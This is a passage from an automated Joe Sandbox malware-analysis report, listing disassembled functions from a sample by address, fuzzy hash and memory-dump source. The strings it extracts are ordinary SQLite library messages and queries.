                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: LAST TERM OF $USE TEMP B-TREE FOR %sORDER BY$USE TEMP B-TREE FOR LAST %d TERMS OF ORDER BY
                                                                                                                                                                                      • API String ID: 0-13984226
                                                                                                                                                                                      • Opcode ID: 8fe7376a9f3cbe8ba2ff67ed1f805d9e0ad474f09f004b43e5cd3b66e7842909
                                                                                                                                                                                      • Instruction ID: 6e0d85a8ccb34468e5a2c0664a922519df7c17b073dc9068c4af7b5557888996
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fe7376a9f3cbe8ba2ff67ed1f805d9e0ad474f09f004b43e5cd3b66e7842909
                                                                                                                                                                                      • Instruction Fuzzy Hash: B172D176A08A81CBD720DF15E440BAD7BA1F784F88F168236CB8E47768DB79D451CB81
                                                                                                                                                                                      Function 00007FFEEE138EF0 Relevance: 4.2, Strings: 3, Instructions: 463COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 5$7$row value misused
                                                                                                                                                                                      • API String ID: 0-355943616
                                                                                                                                                                                      • Opcode ID: 3d747acb97f916b3c14bb04a40449274205dd0918f1676c2037c097a09650a36
                                                                                                                                                                                      • Instruction ID: f1c71656676f78d91f9f2901dc36503482b0fc5d2d4143535d9215f7fd744d2c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d747acb97f916b3c14bb04a40449274205dd0918f1676c2037c097a09650a36
                                                                                                                                                                                      • Instruction Fuzzy Hash: ED22AF72A086818AD720CF19E440BAD7BA5F784B94F578137DBCE477A9CB78D485CB01
                                                                                                                                                                                      Function 00007FFEEE1B4C90 Relevance: 4.1, Strings: 3, Instructions: 392COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                      • API String ID: 0-4001610065
                                                                                                                                                                                      • Opcode ID: 6c603e39f9a3097107824c9f55f133f55402164eb61ae80f1fad4887f2c54ecc
                                                                                                                                                                                      • Instruction ID: d8675895339980b21fb9b8e1384e96bee73da16b44e695178b6b288460013fe4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c603e39f9a3097107824c9f55f133f55402164eb61ae80f1fad4887f2c54ecc
                                                                                                                                                                                      • Instruction Fuzzy Hash: DD029F32A09B86C6E7648F15F4447A933A2FB88784F478036DA8D47765EFBCE484C742
                                                                                                                                                                                      Function 00007FFEEE132A90 Relevance: 4.0, Strings: 3, Instructions: 217COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                      • API String ID: 0-4001610065
                                                                                                                                                                                      • Opcode ID: 6a07c762050a0bd0c9dafa72d53ca9078a01caa1fb245c3d44338a13c4930ebf
                                                                                                                                                                                      • Instruction ID: edaeeea83b23cd54a3214ef8d5ae91a8e28cdd8a884b3eb52068f8423b11347a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a07c762050a0bd0c9dafa72d53ca9078a01caa1fb245c3d44338a13c4930ebf
                                                                                                                                                                                      • Instruction Fuzzy Hash: F291AF72A0878687D714AF26F58426977A1FB84B84F474036DF8D47B61DF78E891C702
                                                                                                                                                                                      Function 00007FFEEE12F5A0 Relevance: 3.9, Strings: 3, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                      • API String ID: 0-4001610065
                                                                                                                                                                                      • Opcode ID: e9ba09a2d25743db847674225f457755739cea2aeed368362171beb30f9384af
                                                                                                                                                                                      • Instruction ID: fe8bc8c9f2a4707fa05ead8e110f6a854f265524b4408ddc98a2aacc29c9a64a
                                                                                                                                                                                      • Opcode Fuzzy Hash: e9ba09a2d25743db847674225f457755739cea2aeed368362171beb30f9384af
                                                                                                                                                                                      • Instruction Fuzzy Hash: B461C762B0879142EB648F26E54033927A1FB8DB80F174136DE8E57770CFB9E8D29741
                                                                                                                                                                                      Function 00007FFEEE1725A0 Relevance: 3.7, Strings: 2, Instructions: 1161COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: DELETE FROM '%q'.'%q_data' WHERE id>=? AND id<=?$DELETE FROM '%q'.'%q_idx' WHERE segid=?
                                                                                                                                                                                      • API String ID: 0-1811289845
                                                                                                                                                                                      • Opcode ID: b6b146aee013950ab8ef86aca144395e8f47c6aa3924b7aa79dc6219dd926258
                                                                                                                                                                                      • Instruction ID: a158794696866f2c6561223cf1f3aa5c1961559d37ccf5bb5a10a2f00802e396
                                                                                                                                                                                      • Opcode Fuzzy Hash: b6b146aee013950ab8ef86aca144395e8f47c6aa3924b7aa79dc6219dd926258
                                                                                                                                                                                      • Instruction Fuzzy Hash: 08C29EB2A0878286EB54CF25E4443BD77A1FB45B88F138136DA8D477A4DFB8E591C702
                                                                                                                                                                                      Function 00007FFEEE236E30 Relevance: 3.5, APIs: 2, Instructions: 508COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3997070919-0
                                                                                                                                                                                      • Opcode ID: e79b72e8b79be243d44fe629eb2a3a90386f5c847bdc0db6c38668ba5c18dd31
                                                                                                                                                                                      • Instruction ID: 5693c64d4bfae4508cf4b686630a497b5acf5328d1c3058703fa331eb6f21dd1
                                                                                                                                                                                      • Opcode Fuzzy Hash: e79b72e8b79be243d44fe629eb2a3a90386f5c847bdc0db6c38668ba5c18dd31
                                                                                                                                                                                      • Instruction Fuzzy Hash: 98323636A08A4386EF54CF26E44036E73A1FB88B88F174131DE8E57764DFB8E8458B41
                                                                                                                                                                                      Function 00007FFEEE1C6690 Relevance: 3.3, Strings: 2, Instructions: 825COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: @$rows deleted
                                                                                                                                                                                      • API String ID: 0-3120709674
                                                                                                                                                                                      • Opcode ID: 1760b45886ef156f09229601bb7b9ed7295d86ea181ee365c454bfb11108a558
                                                                                                                                                                                      • Instruction ID: e8c106b9a976f68192a6ace33b4c6a94d4ac7e80f9069018ec605d8225107683
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1760b45886ef156f09229601bb7b9ed7295d86ea181ee365c454bfb11108a558
                                                                                                                                                                                      • Instruction Fuzzy Hash: C682617260879186EB64DF25B0417AA77A1FB88B84F064136DBCD47BA5DFBCE481CB01
                                                                                                                                                                                      Function 00007FFEEE10AAE6 Relevance: 2.9, Strings: 2, Instructions: 380COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: G$fts5 expression tree is too large (maximum depth %d)
                                                                                                                                                                                      • API String ID: 0-1043253150
                                                                                                                                                                                      • Opcode ID: 1dacaa6d403f56b6151e330b83b0a2136c88c759f46f1e11ad4bfe2d02e929b9
                                                                                                                                                                                      • Instruction ID: 15e29e16773b7fb956cc5f6722b720f5f065d33c154b30d405650573be8270a6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1dacaa6d403f56b6151e330b83b0a2136c88c759f46f1e11ad4bfe2d02e929b9
                                                                                                                                                                                      • Instruction Fuzzy Hash: A0026972A09A5286EB558F16F5547B933A1FF88B84F074136DA8D076B8DFBCE481C302
                                                                                                                                                                                      Function 00007FFEEE238830 Relevance: 2.9, Strings: 2, Instructions: 379COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: $recovered %d frames from WAL file %s
                                                                                                                                                                                      • API String ID: 0-3175670447
                                                                                                                                                                                      • Opcode ID: 63699c3f95372a92f3a2b3fdc19fab25a4b70f5c70196a9996f526a0550bd2b3
                                                                                                                                                                                      • Instruction ID: deaea2ee2afd5fc476be92368efd0fa6b9f77883a3582ab94121466cde35124e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 63699c3f95372a92f3a2b3fdc19fab25a4b70f5c70196a9996f526a0550bd2b3
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3CF1A332A0878686D7689F25E44076E77A1FBC8B88F135135DA8D87BA8DF78E444CB41
                                                                                                                                                                                      Function 00007FFEEE18E770 Relevance: 2.8, Strings: 2, Instructions: 340COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: -- TRIGGER %s$out of memory
                                                                                                                                                                                      • API String ID: 0-3478380517
                                                                                                                                                                                      • Opcode ID: 23aabf06f57b6786606c5325c3a9138d2184255b20b78c424074b3fddfd34c14
                                                                                                                                                                                      • Instruction ID: 336fd8c1712a189949f50f4517658c912890e81fe486a66ea8f3702f37e3fd50
                                                                                                                                                                                      • Opcode Fuzzy Hash: 23aabf06f57b6786606c5325c3a9138d2184255b20b78c424074b3fddfd34c14
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BF18F72A09B8186EB60CF65E8803BD77A0FB88B84F564136DACD477A5DF78E091C741
                                                                                                                                                                                      Function 00007FFEEE17FEF0 Relevance: 2.8, Strings: 1, Instructions: 1539COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • SELECT pgno FROM '%q'.'%q_idx' WHERE segid=? AND term<=? ORDER BY term DESC LIMIT 1, xrefs: 00007FFEEE1808B2
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: SELECT pgno FROM '%q'.'%q_idx' WHERE segid=? AND term<=? ORDER BY term DESC LIMIT 1
                                                                                                                                                                                      • API String ID: 0-3976175944
                                                                                                                                                                                      • Opcode ID: fedb56156b9bc48f73f437f3c5a3ec9536f85fdf285c9aadbcb7d6a8aaf38f46
                                                                                                                                                                                      • Instruction ID: fc74ccb38f942b245b0234994534b580f18b0682318f8c671573abeddfcce618
                                                                                                                                                                                      • Opcode Fuzzy Hash: fedb56156b9bc48f73f437f3c5a3ec9536f85fdf285c9aadbcb7d6a8aaf38f46
                                                                                                                                                                                      • Instruction Fuzzy Hash: 13F24822A09B8686FA549F16F94037963A0FF88B84F17457ADACD43774DFBDE4808346
                                                                                                                                                                                      Function 00007FFEEE147660 Relevance: 2.0, Strings: 1, Instructions: 785COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                      • API String ID: 0-1993550816
                                                                                                                                                                                      • Opcode ID: 800ee10b2637b53d27522779f668809876616853b59c53bd878f5cf2433dc974
                                                                                                                                                                                      • Instruction ID: b07d82ef09215a6f6ade8ac0b7294a82c2619d38e2e544d0b1d076c8ded018dd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 800ee10b2637b53d27522779f668809876616853b59c53bd878f5cf2433dc974
                                                                                                                                                                                      • Instruction Fuzzy Hash: 40829D72618B818ADB60DF25E040BBD7BA1F784F88F568136DB8E47765DB78E580CB01
                                                                                                                                                                                      Function 00007FFEEE102BE0 Relevance: 1.8, Strings: 1, Instructions: 535COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                      • API String ID: 0-2564639436
                                                                                                                                                                                      • Opcode ID: 5d1d8df20a067cdd600f4e3829427086ed0d9efb72d7c63e22abf0cf9beb3e2a
                                                                                                                                                                                      • Instruction ID: 15e6912efa1ea742ca47ec63662f8636ec906f9e1c715d7c8c3230c406ba27bd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d1d8df20a067cdd600f4e3829427086ed0d9efb72d7c63e22abf0cf9beb3e2a
                                                                                                                                                                                      • Instruction Fuzzy Hash: E832E522A0C68685E6658B25B0403796391BF99BC4F174333DEDE573BADFADE481C302
                                                                                                                                                                                      Function 00007FFEEE230510 Relevance: 1.7, Strings: 1, Instructions: 485COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
